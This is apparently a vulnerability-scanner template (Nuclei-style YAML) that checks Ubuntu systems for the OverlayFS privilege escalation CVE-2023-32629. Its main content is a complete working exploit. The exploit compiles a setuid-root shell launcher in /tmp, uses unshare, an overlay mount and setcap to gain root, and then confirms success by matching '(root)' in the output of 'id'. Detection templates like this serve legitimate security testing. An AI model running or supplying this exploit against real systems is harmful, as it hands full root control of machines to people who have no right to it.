39 lines
1.6 KiB
YAML
39 lines
1.6 KiB
YAML
|
id: CVE-2023-32629
|
||
|
|
|
||
|
|
info:
|
||
|
|
name: GameOver(lay) - Local Privilege Escalation in Ubuntu Kernel
|
||
|
|
author: princechaddha
|
||
|
|
severity: high
|
||
|
|
description: |
|
||
|
|
A local privilege escalation vulnerability has been discovered in the OverlayFS module of the Ubuntu kernel. This vulnerability could allow an attacker with local access to escalate their privileges, potentially gaining root-like access to the system.
|
||
|
|
reference:
|
||
|
|
- https://gist.github.com/win3zz/aa1ac16c4458aaaec6dd79343b8cd46f
|
||
|
|
- https://ubuntu.com/security/CVE-2023-32629
|
||
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-32629
|
||
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-2640
|
||
|
|
tags: cve,cve2023,kernel,ubuntu,linux,privesc,local
|
||
|
|
|
||
|
|
self-contained: true
|
||
|
|
code:
|
||
|
|
- engine:
|
||
|
|
- sh
|
||
|
|
- bash
|
||
|
|
source: |
|
||
|
|
id
|
||
|
|
|
||
|
|
- engine:
|
||
|
|
- sh
|
||
|
|
- bash
|
||
|
|
source: |
|
||
|
|
cd /tmp
|
||
|
|
echo '#include <stdio.h>\n#include <stdlib.h>\n#include <unistd.h>\n\nint main() {\n if (setuid(0) != 0) {\n fprintf(stderr, "\\x1b[31mFailed to set UID to 0.\\x1b[0m\\n");\n return 1;\n }\n\n printf("Entering \\x1b[36mprivileged\\x1b[0m shell...\\n");\n if (system("/bin/bash -p") == -1) {\n fprintf(stderr, "\\x1b[31mFailed to execute /bin/bash -p.\\x1b[0m\\n");\n return 1;\n }\n\n return 0;\n}' > test.c
|
||
|
|
gcc test.c -o test
|
||
|
|
unshare -rm sh -c "mkdir -p l u w m && cp test l/ && setcap cap_setuid+eip l/test && mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/test && u/test && id;"
|
||
|
|
|
||
|
|
matchers:
|
||
|
|
- type: dsl
|
||
|
|
dsl:
|
||
|
|
- '!contains(code_1_response, "(root)")'
|
||
|
|
- 'contains(code_2_response, "(root)")'
|
||
|
|
condition: and
|